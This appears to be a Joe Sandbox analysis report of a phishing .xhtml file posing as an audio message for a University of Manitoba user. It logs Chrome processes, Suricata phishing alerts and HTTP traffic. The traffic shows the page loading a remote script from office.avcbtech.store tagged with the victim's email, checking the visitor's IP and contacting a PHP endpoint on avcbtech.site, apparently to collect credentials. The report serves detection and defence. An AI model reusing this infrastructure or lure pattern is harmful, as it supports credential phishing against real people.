36	192.168.2.5	49799	104.26.12.205	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:32:18 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:32:18 UTC	434	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:32:18 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258efe41eecc8b9-EWR server-timing: cfL4;desc="?proto=TCP&rtt=106848&min_rtt=106711&rtt_var=22717&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=34777&cwnd=237&unsent_bytes=0&cid=cf9c3877099945fd&ts=281&x=0"
2025-03-24 20:32:18 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Click to jump to process

Target ID:	4
Start time:	16:29:22
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff78c3f0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	16:29:26
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2264,i,17322950773745086463,4960507594035301740,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2296 /prefetch:3
Imagebase:	0x7ff78c3f0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	16:29:29
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2264,i,17322950773745086463,4960507594035301740,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5112 /prefetch:8
Imagebase:	0x7ff78c3f0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	16:29:33
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\#Ud83d#Udd0aAudio_Msg Umanitoba.xhtml"
Imagebase:	0x7ff78c3f0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Source: Yara match	File source: 0.6.pages.csv, type: HTML
Source: Yara match	File source: 0.7.pages.csv, type: HTML
Source: Yara match	File source: 0.4.pages.csv, type: HTML
Source: Yara match	File source: 0.3.pages.csv, type: HTML
Source: Yara match	File source: 0.5.pages.csv, type: HTML

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=krista.wiebe@umanitoba.ca
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=krista.wiebe@umanitoba.ca
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=krista.wiebe@umanitoba.ca
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=krista.wiebe@umanitoba.ca
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=krista.wiebe@umanitoba.ca
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=krista.wiebe@umanitoba.ca

Source: #Ud83d#Udd0aAudio_Msg Umanitoba.xhtml	HTTP Parser: .location
Source: #Ud83d#Udd0aAudio_Msg Umanitoba.xhtml	HTTP Parser: .location

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: HTML title missing

Source: #Ud83d#Udd0aAudio_Msg Umanitoba.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Umanitoba.xhtml	HTTP Parser: No <meta name="copyright".. found

Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.5:49761 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.5:49779 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.5:49784 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.5:49754 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.5:49795 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.5:49773 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.5:49790 -> 104.168.138.190:443

Source: Joe Sandbox View	IP Address: 185.174.100.20 185.174.100.20
Source: Joe Sandbox View	IP Address: 199.232.196.193 199.232.196.193
Source: Joe Sandbox View	IP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox View	IP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 23.33.40.154
Source: unknown	TCP traffic detected without corresponding DNS query: 23.33.40.154
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 23.33.40.154
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.146
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.146
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.146
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.146
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.146
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.146
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.146
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.146
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.81.227
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.81.227
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /kuk/xls/k1u2k.js?uid=krista.wiebe@umanitoba.ca HTTP/1.1Host: office.avcbtech.storeConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /start/xls/includes/css6.css HTTP/1.1Host: sender.linxcoded.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=a55a58a1b05fe199d16ecb5a43f9ab60
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=a55a58a1b05fe199d16ecb5a43f9ab60
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=a55a58a1b05fe199d16ecb5a43f9ab60
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=a55a58a1b05fe199d16ecb5a43f9ab60
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
